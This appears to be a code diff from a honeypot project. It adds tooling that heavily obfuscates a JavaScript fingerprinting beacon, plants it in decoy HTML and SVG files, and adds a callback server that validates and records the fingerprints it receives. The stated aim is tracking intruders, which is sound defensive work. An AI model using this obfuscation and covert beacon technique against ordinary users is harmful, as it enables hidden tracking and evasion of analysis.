numbers_to_expressions = bool((bits >> 18) & 1)
|
||||||
|
simplify = bool((bits >> 19) & 1)
|
||||||
|
return {
|
||||||
|
"compact": True,
|
||||||
|
"seed": seed,
|
||||||
|
"controlFlowFlattening": True,
|
||||||
|
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
|
||||||
|
"deadCodeInjection": True,
|
||||||
|
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
|
||||||
|
"stringArray": True,
|
||||||
|
"stringArrayEncoding": string_array_encoding,
|
||||||
|
"stringArrayThreshold": 1,
|
||||||
|
"stringArrayRotate": True,
|
||||||
|
"stringArrayShuffle": True,
|
||||||
|
"splitStrings": True,
|
||||||
|
"splitStringsChunkLength": 4 + (bits & 7),
|
||||||
|
"transformObjectKeys": transform_object_keys,
|
||||||
|
"numbersToExpressions": numbers_to_expressions,
|
||||||
|
"simplify": simplify,
|
||||||
|
"selfDefending": False, # breaks SVG embed; not worth the cost
|
||||||
|
"renameGlobals": False,
|
||||||
|
"identifierNamesGenerator": "mangled-shuffled",
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def obfuscate(code: str, *, callback_token: str) -> str:
    """Obfuscate *code* deterministically per *callback_token*.

    The seed and options are derived from the token, serialised with
    *code* into one JSON document, and piped to the Node helper on
    stdin. The helper's stdout is returned unmodified.

    Raises :class:`ObfuscatorError` if the Node binary is not found, the
    helper times out, it exits non-zero, or its stdout is empty or
    whitespace only.
    """
    seed = _seed_from_token(callback_token)
    options = _config_from_seed(seed)
    payload = json.dumps({"code": code, "options": options})
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            [_NODE_BIN, str(_HELPER)],
            input=payload, capture_output=True, text=True,
            # Pin the pipe encoding: without it the locale's encoding is
            # used, so the same mint could decode differently (or fail)
            # on hosts with a non-UTF-8 locale.
            encoding="utf-8",
            timeout=_TIMEOUT_S, check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e
    if proc.returncode != 0:
        # Cap stderr so a noisy stack trace does not flood the message.
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    out = proc.stdout
    if not out.strip():
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return out
|
||||||
|
|
||||||
|
|
||||||
|
def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
    """Produce the obfuscated fingerprint script for a single mint.

    The payload template is read from disk, its ``{{BEACON_URL}}``,
    ``{{MINT_UUID}}`` and ``{{MINT_NONCE}}`` placeholders are filled in
    (in that order), and the result is passed to :func:`obfuscate` with
    the same callback token.

    The beacon URL is ``<http_base>/c/<callback_token>`` with any
    trailing slash on *http_base* removed. The nonce is what the payload
    sends as ``k=`` on its beacon requests; the worker is expected to
    reject fingerprints whose ``k`` does not match the stored
    :attr:`CanaryToken.fingerprint_nonce`.
    """
    src = _PAYLOAD.read_text(encoding="utf-8")
    beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
    substitutions = (
        ("{{BEACON_URL}}", beacon),
        ("{{MINT_UUID}}", mint_uuid),
        ("{{MINT_NONCE}}", nonce),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return obfuscate(src, callback_token=callback_token)
|
||||||
10
decnet/canary/package.json
Normal file
10
decnet/canary/package.json
Normal file
@@ -0,0 +1,10 @@
|
|||||||
|
{
|
||||||
|
"name": "decnet-canary-obfuscator",
|
||||||
|
"version": "0.1.0",
|
||||||
|
"private": true,
|
||||||
|
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
|
||||||
|
"main": "_obfuscate_helper.js",
|
||||||
|
"dependencies": {
|
||||||
|
"javascript-obfuscator": "^5.4.2"
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||||
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
|
||||||
import base64
|
|
||||||
import os
|
import os
|
||||||
import shlex
|
from datetime import datetime, timedelta, timezone
|
||||||
import time
|
|
||||||
from secrets import token_urlsafe
|
from secrets import token_urlsafe
|
||||||
from typing import Any, Iterable, Optional
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
|
|||||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||||
from decnet.canary.factory import get_generator
|
from decnet.canary.factory import get_generator
|
||||||
from decnet.canary.paths import default_path_for
|
from decnet.canary.paths import default_path_for
|
||||||
|
from decnet.decky_io import (
|
||||||
|
delete_file_from_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.web.db.repository import BaseRepository
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
log = get_logger("canary.planter")
|
log = get_logger("canary.planter")
|
||||||
|
|
||||||
_DOCKER = "docker"
|
|
||||||
_TIMEOUT = 8.0
|
|
||||||
# Container suffix — matches the orchestrator SSH driver's convention
|
# Container suffix — matches the orchestrator SSH driver's convention
|
||||||
# (``<decky_name>-ssh``). Canary placement always happens through the
|
# (``<decky_name>-ssh``). Canary placement always happens through the
|
||||||
# ssh container because every decky has one and it carries the most
|
# ssh container because every decky has one and it carries the most
|
||||||
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
|
|||||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
# resolve_topology_container is re-exported from decky_io for back-compat
|
||||||
idx = path.rfind("/")
|
# with callers (tests, deploy hook) that imported it from this module
|
||||||
if idx <= 0:
|
# before the decky_io extraction.
|
||||||
return "/"
|
__all__ = [
|
||||||
return path[:idx]
|
"plant",
|
||||||
|
"revoke",
|
||||||
|
"resolve_topology_container",
|
||||||
async def _run(
|
"seed_baseline",
|
||||||
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
|
"seed_baseline_topology",
|
||||||
) -> tuple[int, str, str]:
|
]
|
||||||
try:
|
|
||||||
proc = await asyncio.create_subprocess_exec(
|
|
||||||
*argv,
|
|
||||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
|
||||||
stdout=asyncio.subprocess.PIPE,
|
|
||||||
stderr=asyncio.subprocess.PIPE,
|
|
||||||
)
|
|
||||||
except FileNotFoundError as exc:
|
|
||||||
return 127, "", f"argv[0] not found: {exc}"
|
|
||||||
try:
|
|
||||||
stdout, stderr = await asyncio.wait_for(
|
|
||||||
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
|
|
||||||
)
|
|
||||||
except asyncio.TimeoutError:
|
|
||||||
try:
|
|
||||||
proc.kill()
|
|
||||||
except ProcessLookupError:
|
|
||||||
pass
|
|
||||||
return 124, "", "timeout"
|
|
||||||
return (
|
|
||||||
proc.returncode if proc.returncode is not None else -1,
|
|
||||||
stdout.decode("utf-8", "replace"),
|
|
||||||
stderr.decode("utf-8", "replace"),
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
|
|
||||||
"""Compose the ``sh -c`` script + stdin payload for one artifact.
|
|
||||||
|
|
||||||
Binary safety: we base64-encode on the host and stream the result
|
|
||||||
over stdin to ``base64 -d`` inside the container, so the bytes
|
|
||||||
never touch the argv (kernel ARG_MAX would reject anything larger
|
|
||||||
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
|
|
||||||
and ``touch -d @<unix_ts>`` are present on every Linux base image
|
|
||||||
we ship, so there's no per-distro branching.
|
|
||||||
"""
|
|
||||||
encoded = base64.b64encode(artifact.content)
|
|
||||||
mtime = int(time.time() + artifact.mtime_offset)
|
|
||||||
mode_str = oct(artifact.mode)[2:]
|
|
||||||
parts = [
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
|
|
||||||
f"base64 -d > {shlex.quote(artifact.path)}",
|
|
||||||
f"chmod {mode_str} {shlex.quote(artifact.path)}",
|
|
||||||
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
|
|
||||||
]
|
|
||||||
return " && ".join(parts), encoded
|
|
||||||
|
|
||||||
|
|
||||||
async def _publish(
|
async def _publish(
|
||||||
@@ -139,6 +93,7 @@ async def plant(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Write *artifact* into the decky's ssh container.
|
"""Write *artifact* into the decky's ssh container.
|
||||||
|
|
||||||
@@ -157,13 +112,12 @@ async def plant(
|
|||||||
await repo.update_canary_token_state(token_uuid, "failed", err)
|
await repo.update_canary_token_state(token_uuid, "failed", err)
|
||||||
return False, err
|
return False, err
|
||||||
|
|
||||||
sh_cmd, stdin_payload = _build_plant_command(artifact)
|
target_container = container or _container_for(decky_name)
|
||||||
# ``-i`` keeps stdin attached so base64 -d inside the container can
|
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
|
||||||
# consume the encoded payload streamed from the host.
|
success, error = await write_file_to_container(
|
||||||
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
|
target_container, artifact.path, artifact.content,
|
||||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
|
mode=artifact.mode, mtime=mtime,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
if success:
|
if success:
|
||||||
@@ -182,8 +136,8 @@ async def plant(
|
|||||||
|
|
||||||
if not success:
|
if not success:
|
||||||
log.warning(
|
log.warning(
|
||||||
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
|
"canary.plant failed decky=%s token=%s container=%s err=%r",
|
||||||
decky_name, token_uuid, rc, stderr[:120],
|
decky_name, token_uuid, target_container, error,
|
||||||
)
|
)
|
||||||
return success, error
|
return success, error
|
||||||
|
|
||||||
@@ -196,6 +150,7 @@ async def revoke(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Best-effort unlink + state transition + bus publish.
|
"""Best-effort unlink + state transition + bus publish.
|
||||||
|
|
||||||
@@ -203,11 +158,10 @@ async def revoke(
|
|||||||
the file is gone after the call (whether we deleted it or it was
|
the file is gone after the call (whether we deleted it or it was
|
||||||
already missing); only docker / container-down errors return False.
|
already missing); only docker / container-down errors return False.
|
||||||
"""
|
"""
|
||||||
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
|
target_container = container or _container_for(decky_name)
|
||||||
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
|
success, error = await delete_file_from_container(
|
||||||
rc, _stdout, stderr = await _run(argv)
|
target_container, placement_path,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
||||||
@@ -250,6 +204,7 @@ async def seed_baseline(
|
|||||||
persona: str = "linux",
|
persona: str = "linux",
|
||||||
created_by: str = "system",
|
created_by: str = "system",
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> list[dict[str, Any]]:
|
) -> list[dict[str, Any]]:
|
||||||
"""Plant the configured baseline canary set on one decky.
|
"""Plant the configured baseline canary set on one decky.
|
||||||
|
|
||||||
@@ -293,9 +248,59 @@ async def seed_baseline(
|
|||||||
await plant(
|
await plant(
|
||||||
decky_name, artifact,
|
decky_name, artifact,
|
||||||
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
||||||
|
container=container,
|
||||||
)
|
)
|
||||||
out.append({
|
out.append({
|
||||||
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
||||||
"callback_token": slug, "placement_path": artifact.path,
|
"callback_token": slug, "placement_path": artifact.path,
|
||||||
})
|
})
|
||||||
return out
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
async def seed_baseline_topology(
    repo: BaseRepository,
    topology_id: str,
    *,
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
    """Seed the baseline canary set on each decky of a MazeNET topology.

    This is the topology counterpart of :func:`seed_baseline`. The
    target container is chosen by :func:`resolve_topology_container`
    from the decky's service list, because a topology decky may have no
    ssh service to plant through.

    A topology that cannot be hydrated is logged and yields an empty
    list; deckies without a name are skipped. The result is a flat list
    of the per-token dicts returned by :func:`seed_baseline`, each with
    a ``decky_name`` key added.
    """
    from decnet.topology.persistence import hydrate

    topology = await hydrate(repo, topology_id)
    if topology is None:
        log.warning(
            "canary.seed_baseline_topology: topology %s not found", topology_id,
        )
        return []

    planted: list[dict[str, Any]] = []
    for entry in topology["deckies"]:
        config = entry.get("decky_config") or {}
        decky_name = config.get("name") or entry.get("name")
        if decky_name:
            target = resolve_topology_container(
                topology_id, decky_name, entry.get("services") or [],
            )
            # MazeNET deckies don't carry an OS persona today; default to
            # linux (every base image we ship is Linux).
            seeded = await seed_baseline(
                decky_name, repo,
                persona="linux", created_by=created_by, bus=bus,
                container=target,
            )
            for row in seeded:
                row["decky_name"] = decky_name
            planted.extend(seeded)
    return planted
|
||||||
|
|||||||
@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import binascii
|
||||||
|
import json
|
||||||
import os
|
import os
|
||||||
|
import time
|
||||||
|
import uuid
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
from fastapi import FastAPI, Request, Response
|
from fastapi import FastAPI, Request, Response
|
||||||
|
|
||||||
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Namespace used by fingerprint generators to derive mint UUID.
|
||||||
|
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps, oldest first.
# Not shared across worker restarts or processes — acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
# Soft cap on the number of tracked keys. Once the map reaches this size,
# each call first evicts buckets whose newest timestamp has left the window,
# so idle (token, IP) pairs cannot pile up for the life of the process.
# Buckets that are still inside the window are never evicted, so the map may
# exceed the cap while that many pairs are genuinely active.
_FP_RATE_MAX_KEYS = 4096
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}


def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
    """Record a fingerprint persist attempt and report whether it is allowed.

    Args:
        token_uuid: UUID of the canary token the fingerprint belongs to.
        src_ip: Client address the request was attributed to.

    Returns:
        ``True`` (and the attempt is recorded) when fewer than
        ``_FP_RATE_LIMIT`` attempts for this key fall inside the trailing
        ``_FP_RATE_WINDOW_S`` seconds; ``False`` otherwise. Denied attempts
        are not recorded, so they do not extend the lock-out.
    """
    key = (token_uuid, src_ip)
    now = time.monotonic()
    cutoff = now - _FP_RATE_WINDOW_S

    # Opportunistic eviction: timestamps are appended in monotonic order, so
    # the last element is the newest and is enough to decide staleness.
    if len(_fp_rate_buckets) >= _FP_RATE_MAX_KEYS:
        stale_keys = [
            k for k, stamps in _fp_rate_buckets.items()
            if not stamps or stamps[-1] <= cutoff
        ]
        for k in stale_keys:
            del _fp_rate_buckets[k]

    # Keep only the timestamps that are still inside the window.
    bucket = [t for t in _fp_rate_buckets.get(key, ()) if t > cutoff]
    allowed = len(bucket) < _FP_RATE_LIMIT
    if allowed:
        bucket.append(now)
    _fp_rate_buckets[key] = bucket
    return allowed
|
||||||
|
|
||||||
|
|
||||||
|
def _is_valid_fp_shape(fp: dict) -> bool:
    """Layer B: decide whether a decoded fingerprint blob is structurally sane.

    The blob is accepted only when ``mint`` is a non-empty string and at
    least three of the known section keys hold a dict.
    """
    mint = fp.get("mint")
    if not (isinstance(mint, str) and mint):
        return False
    sections = ("nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc")
    dict_sections = [name for name in sections if isinstance(fp.get(name), dict)]
    return len(dict_sections) >= 3
|
||||||
|
|
||||||
|
|
||||||
def _http_base() -> str:
|
def _http_base() -> str:
|
||||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||||
|
|
||||||
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
|
|
||||||
@app.get("/c/{slug}")
|
@app.get("/c/{slug}")
|
||||||
async def callback(slug: str, request: Request) -> Response:
|
async def callback(slug: str, request: Request) -> Response:
|
||||||
|
raw_nonce = request.query_params.get("k")
|
||||||
|
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
|
||||||
|
merged_headers = dict(request.headers)
|
||||||
|
if fp_meta:
|
||||||
|
merged_headers.update(fp_meta)
|
||||||
await _record_hit(
|
await _record_hit(
|
||||||
repo, bus,
|
repo, bus,
|
||||||
slug=slug,
|
slug=slug,
|
||||||
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
user_agent=request.headers.get("user-agent"),
|
user_agent=request.headers.get("user-agent"),
|
||||||
request_path=str(request.url.path),
|
request_path=str(request.url.path),
|
||||||
dns_qname=None,
|
dns_qname=None,
|
||||||
raw_headers=dict(request.headers),
|
raw_headers=merged_headers,
|
||||||
|
parsed_fp=parsed_fp,
|
||||||
|
raw_nonce=raw_nonce,
|
||||||
)
|
)
|
||||||
# Always 200 with a tiny image so the attacker's client sees
|
# Always 200 with a tiny image so the attacker's client sees
|
||||||
# a "success" — same return regardless of whether the slug is
|
# a "success" — same return regardless of whether the slug is
|
||||||
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
return app
|
return app
|
||||||
|
|
||||||
|
|
||||||
|
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024


def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
    """Decode fingerprint-payload query params into (meta_dict, parsed_fp).

    The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:

    * ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
    * ``?d=<b64url-json>`` — single-shot fingerprint dump.
    * ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.

    Args:
        qp: Mapping-like query parameters. Anything falsy, or lacking a
            ``get`` method, is treated as "no parameters".

    Returns:
        A tuple of:

        - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers
          (``_fp_open``, ``_fp_oversize``, ``_fp_decode_error``, or the
          chunk fields ``_fp_sid`` / ``_fp_idx`` / ``_fp_total`` /
          ``_fp_chunk``).
        - ``parsed_fp`` — the decoded fingerprint dict for validation, or
          ``None`` when there's no ``?d=``, the request is a chunk, the
          payload is oversize, or decoding fails.

    This function never raises on malformed payloads; every decode failure
    is reported through ``_fp_decode_error``.
    """
    out: dict[str, Any] = {}
    parsed_fp: Optional[dict] = None
    if not qp or not hasattr(qp, "get"):
        return out, parsed_fp

    if qp.get("o"):
        out["_fp_open"] = "1"

    d = qp.get("d")
    if not d:
        return out, parsed_fp
    if len(d) > _FP_CHUNK_MAX:
        out["_fp_oversize"] = "1"
        return out, parsed_fp

    sid = qp.get("s")
    idx = qp.get("i")
    total = qp.get("n")
    if sid and idx and total:
        # Chunked dump: pass the raw chunk through untouched; it cannot be
        # decoded on its own.
        out["_fp_sid"] = sid
        out["_fp_idx"] = idx
        out["_fp_total"] = total
        out["_fp_chunk"] = d
        return out, parsed_fp

    # Single-shot: decode and pass back as parsed_fp; validation runs in
    # _record_hit after token lookup so we have the stored nonce at hand.
    try:
        # Senders strip base64 padding; restore it before decoding.
        padded = d + "=" * (-len(d) % 4)
        raw = base64.urlsafe_b64decode(padded.encode("ascii"))
        parsed = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError, UnicodeDecodeError, RecursionError):
        # RecursionError: json.loads raises it (it is not a ValueError) on
        # pathologically nested input, and a chunk under the size cap can
        # nest deeply enough to trigger it. Uncaught, it would propagate
        # out of the request handler instead of being recorded as a hit.
        out["_fp_decode_error"] = "1"
        return out, parsed_fp

    if isinstance(parsed, dict):
        parsed_fp = parsed
    else:
        # Valid JSON but not an object — not a fingerprint.
        out["_fp_decode_error"] = "1"
    return out, parsed_fp
|
||||||
|
|
||||||
|
|
||||||
def _client_ip(request: Request) -> str:
|
def _client_ip(request: Request) -> str:
|
||||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||||
# proxy. Take the leftmost address in the chain; everything after
|
# proxy. Take the leftmost address in the chain; everything after
|
||||||
@@ -154,16 +262,58 @@ async def _record_hit(
|
|||||||
request_path: Optional[str],
|
request_path: Optional[str],
|
||||||
dns_qname: Optional[str],
|
dns_qname: Optional[str],
|
||||||
raw_headers: Optional[dict],
|
raw_headers: Optional[dict],
|
||||||
|
parsed_fp: Optional[dict] = None,
|
||||||
|
raw_nonce: Optional[str] = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
||||||
|
|
||||||
Unknown slugs are silently swallowed: returning the same response
|
Unknown slugs are silently swallowed: returning the same response
|
||||||
for known and unknown slugs is the stealth posture, and persisting
|
for known and unknown slugs is the stealth posture, and persisting
|
||||||
every random scan would clutter the DB.
|
every random scan would clutter the DB.
|
||||||
|
|
||||||
|
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
|
||||||
|
it is validated through four layers before being merged into raw_headers:
|
||||||
|
A) nonce match against CanaryToken.fingerprint_nonce,
|
||||||
|
B) structural shape check,
|
||||||
|
C) mint UUID consistency,
|
||||||
|
D) per-(token, IP) rate limit.
|
||||||
|
Each failure drops the structured ``_fp`` and sets a flag: ``_fp_invalid_nonce``, ``_fp_invalid_shape``, ``_fp_invalid_mint`` or ``_fp_rate_limited``.
|
||||||
|
The trigger row always lands regardless — the GET hit is itself forensic.
|
||||||
"""
|
"""
|
||||||
token = await repo.get_canary_token_by_slug(slug)
|
token = await repo.get_canary_token_by_slug(slug)
|
||||||
if token is None:
|
if token is None:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
final_headers: dict[str, Any] = dict(raw_headers or {})
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
|
||||||
|
|
||||||
|
# Layer A — nonce
|
||||||
|
if stored_nonce is not None and raw_nonce != stored_nonce:
|
||||||
|
final_headers["_fp_invalid_nonce"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer B — shape (only when nonce passed or no nonce enforced)
|
||||||
|
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
|
||||||
|
final_headers["_fp_invalid_shape"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer C — mint UUID consistency
|
||||||
|
if parsed_fp is not None:
|
||||||
|
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
|
||||||
|
if parsed_fp.get("mint") != expected_mint:
|
||||||
|
final_headers["_fp_invalid_mint"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer D — rate limit
|
||||||
|
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
|
||||||
|
final_headers["_fp_rate_limited"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
final_headers["_fp"] = parsed_fp
|
||||||
|
|
||||||
trigger_id = await repo.record_canary_trigger({
|
trigger_id = await repo.record_canary_trigger({
|
||||||
"token_uuid": token["uuid"],
|
"token_uuid": token["uuid"],
|
||||||
"occurred_at": datetime.now(timezone.utc),
|
"occurred_at": datetime.now(timezone.utc),
|
||||||
@@ -171,7 +321,7 @@ async def _record_hit(
|
|||||||
"user_agent": user_agent,
|
"user_agent": user_agent,
|
||||||
"request_path": request_path,
|
"request_path": request_path,
|
||||||
"dns_qname": dns_qname,
|
"dns_qname": dns_qname,
|
||||||
"raw_headers": raw_headers or {},
|
"raw_headers": final_headers,
|
||||||
})
|
})
|
||||||
try:
|
try:
|
||||||
await bus.publish(
|
await bus.publish(
|
||||||
@@ -189,6 +339,22 @@ async def _record_hit(
|
|||||||
except Exception as e: # noqa: BLE001 — best effort
|
except Exception as e: # noqa: BLE001 — best effort
|
||||||
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||||
|
|
||||||
|
# Auto-deregister fingerprint canaries after the first valid fingerprint
|
||||||
|
# is collected. Slug goes dark; the stealth posture means the attacker
|
||||||
|
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
|
||||||
|
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
|
||||||
|
# http/dns canaries are NOT auto-revoked.
|
||||||
|
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
|
||||||
|
try:
|
||||||
|
await repo.update_canary_token_state(token["uuid"], "revoked")
|
||||||
|
await bus.publish(
|
||||||
|
topics.canary(token["uuid"], topics.CANARY_REVOKED),
|
||||||
|
{"token_id": token["uuid"], "trigger_id": trigger_id,
|
||||||
|
"reason": "fingerprint_collected"},
|
||||||
|
)
|
||||||
|
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
|
||||||
|
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
|
||||||
|
|
||||||
|
|
||||||
# ---------------------------- DNS surface --------------------------------
|
# ---------------------------- DNS surface --------------------------------
|
||||||
|
|
||||||
@@ -214,7 +380,7 @@ async def _start_dns_server(
|
|||||||
local_addr=(_dns_bind(), _dns_port()),
|
local_addr=(_dns_bind(), _dns_port()),
|
||||||
)
|
)
|
||||||
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
|
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
|
||||||
